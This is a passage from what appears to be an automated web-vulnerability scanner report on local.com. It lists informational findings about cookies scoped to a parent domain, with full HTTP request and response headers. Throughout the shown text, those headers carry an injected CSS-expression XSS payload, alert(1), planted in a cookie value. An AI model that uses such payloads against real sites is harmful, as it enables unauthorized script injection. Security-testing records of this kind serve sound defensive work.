__utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 28952
Date: Thu, 03 Feb 2011 16:53:12 GMT
Content-Length: 28952
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:12 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Local.com Frequently Asked Qu
...[SNIP]...

7.30. http://www.local.com/privacy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /privacy/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 50592
Date: Thu, 03 Feb 2011 16:51:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:52 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 50592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Local.com Privacy Policy</tit
...[SNIP]...

7.31. http://www.local.com/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 130109
Date: Thu, 03 Feb 2011 15:55:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=2q4batq1irqnjjzf5gpd3v55; path=/; HttpOnly
Set-Cookie: localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=9e9962ee-715a-422c-a9da-c41c1b56ab77&expdate=634349085044720371&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:55:04 GMT; path=/
Set-Cookie: localcom_s=cid=506&exp=634323183044720371; domain=local.com; expires=Thu, 03-Feb-2011 16:25:04 GMT; path=/
Content-Length: 130109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...

7.32. http://www.local.com/results/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /results/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 133026
Date: Thu, 03 Feb 2011 16:50:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:30 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 133026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...

7.33. http://www.local.com/sitemap.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitemap.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 29850
Date: Thu, 03 Feb 2011 16:53:24 GMT
Content-Length: 29850
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:24 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for Local
...[SNIP]...

7.34. http://www.local.com/sitemap/chicago-il.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap/chicago-il.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitemap/chicago-il.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 130753
Date: Thu, 03 Feb 2011 16:50:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:56 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Chicago%2c+Illinois&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 130753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Chicago, IL Local Business Se
...[SNIP]...

7.35. http://www.local.com/sitemap/los-angeles-ca.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap/los-angeles-ca.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitemap/los-angeles-ca.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 132986
Date: Thu, 03 Feb 2011 16:50:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:42 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Los+Angeles%2c+California&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 132986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Los Angeles, CA Local Busines
...[SNIP]...

7.36. http://www.local.com/sitemap/new-york-ny.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap/new-york-ny.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitemap/new-york-ny.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 131303
Date: Thu, 03 Feb 2011 16:50:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:44 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=New+York%2c+New+York&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 131303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>New York, NY Local Business S
...[SNIP]...

7.37. http://www.local.com/terms/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /terms/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /terms/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 65330
Date: Thu, 03 Feb 2011 16:51:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:38 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 65330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Local.com Terms of Service</t
...[SNIP]...

7.38. http://www.local.com/topics/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /topics/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topics/?topic=food&keyword=food HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; 